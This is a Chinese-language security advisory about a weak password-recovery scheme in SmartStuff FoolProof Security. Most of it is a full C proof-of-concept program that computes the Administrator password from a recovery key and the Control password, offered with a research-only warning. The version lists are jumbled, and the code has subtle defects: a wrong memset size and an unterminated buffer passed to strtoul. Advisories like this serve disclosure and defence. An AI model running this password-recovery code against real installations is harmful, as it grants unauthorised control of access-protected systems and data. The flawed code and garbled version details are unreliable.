安全研究
安全漏洞
SmartStuff FoolProof Security Program管理密码恢复漏洞
发布日期:2004-06-05
更新日期:2004-06-09
受影响系统:
SmartStuff FoolProof Security 3.9.7不受影响系统:
SmartStuff FoolProof Security 3.9.4
SmartStuff FoolProof Security 5.0描述:
SmartStuff FoolProof Security 4.0.2
BUGTRAQ ID: 10467
FoolProof是Smartstuff公司的一个安全程序,它可为Windows和MAC提供访问控制,它可以保护系统文件和文件夹。
FoolProof管理密码加密机制不够强壮,攻击者可以利用这个漏洞恢复应用程序的管理密码信息。
攻击者可以更改密码恢复机制来获得'Administrator'密码信息,从而控制应用程序,访问受保护数据。
<*来源:Cyrillium Security
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
/* The following program calculates the "Administrator" password from the
password recovery key and the "Control" password.
Usage:
Invoke the program with the following arguments:
foolpw HEXADECIMAL_RECOVERY_KEY CONTROL_PASSWORD
Example:
C:\> foolpw BDAD8C8380A6B8BCAC8C2A45484A464C HelloWorld
12345
Source code:
*/
/*
foolpw.c
Copyright (C) 2004 Cyrillium Security Solutions and Services.
Demonstrates a weakness in FoolProof Security password recovery system. See
CYSA-0329 for details.
CYRILLIUM SECURITY SOLUTIONS AND SERVICES DOES NOT PROVIDE ANY WARRANTY FOR
THIS PROGRAM, EITHER EXPRESSED OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE
IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.
THE ENTIRE RISK AS TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.
SHOULD THE PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY
SERVICING, REPAIR OR CORRECTION.
*/
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
int main (int argc, char *argv[])
{
int i; /* Index variable */
char a, /* Temporary variable for calculations */
k[33], /* Recovery key in hexadecimal */
k_array[17], /* Recovery key as array */
c[17], /* Control password */
*b = "D:SKFOIJ(*EHJFL", /* Offsets */
hex_temp[2], /* Temporary storage for hexadecimal conversion */
*endptr; /* Output variable for strtoul */
if (argc != 3)
{
puts ("Usage: foolpw RECOVERY_KEY CONTROL_PASSWORD");
return 1;
}
if (strlen (argv[1]) != 16*2)
{
puts ("Recovery key must be 16 hexadecimal bytes (32 characters)");
return 1;
}
if (strlen (argv[2]) > 16)
{
puts ("Passwords are limited to 16 characters");
return 1;
}
memset (k, 0, sizeof (b));
memset (k_array, 0, sizeof (b));
memset (c, 0, sizeof (c));
memset (hex_temp, 0, sizeof (hex_temp));
strcpy (k, argv[1]);
strcpy (c, argv[2]);
for (i = 0; i < 16; i++)
{
memcpy (hex_temp, &k[i*2], 2);
k_array[i] = strtoul (hex_temp, &endptr, 16);
if (*endptr != '\0')
{
printf("\nInvalid hexadecimal character \'%c\'\n", *endptr);
return 1;
}
a = (c[i] + b[i]) ^ k_array[i];
putc (a, stdout);
}
puts ("");
return 0;
}
建议:
厂商补丁:
SmartStuff
----------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.smartstuff.com/fps/fpsinfo.html
浏览次数:2942
严重程度:0(网友投票)
绿盟科技给您安全的保障